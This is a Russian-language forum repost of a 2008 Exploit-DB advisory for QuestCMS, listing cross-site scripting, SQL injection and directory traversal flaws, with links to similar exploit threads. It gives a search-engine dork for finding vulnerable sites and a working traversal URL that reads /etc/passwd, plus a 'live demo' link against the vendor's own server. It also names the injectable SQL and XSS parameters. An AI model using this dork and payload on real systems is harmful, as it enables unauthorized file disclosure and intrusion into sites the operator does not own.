Exploit QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6853
Проверка EDB
  1. Пройдено
Автор
D3B4G
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4774 cve-2008-4773 cve-2008-4772
Дата публикации
2008-10-27
Код: 
--------------------------------------------------------------------------------

Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

--------------------------------------------------------------------------------
#Author: d3b4g


#contact: bl4ckend[at]gmail[dot]com

--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnibility
=============================
Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html


---------------------------------------------------------------------------------

sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]


XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

greetz:

All my friends,milw0rm...

--------------------------------------------------------------------------------



--------------------------------- [ www.hotlism.org ] --------------------------------------

# milw0rm.com [2008-10-27]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit QuestCMS - 'main.php' Remote File Inclusion
Ответы
0
Просмотры
266
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
601
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
Ответы
0
Просмотры
587
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
592
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
Ответы
0
Просмотры
592
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
585
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
591
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
567
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
Ответы
0
Просмотры
549
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
Ответы
1
Просмотры
5K
Эксплойты & Уязвимости
Rigidbnt
R
Сверху Снизу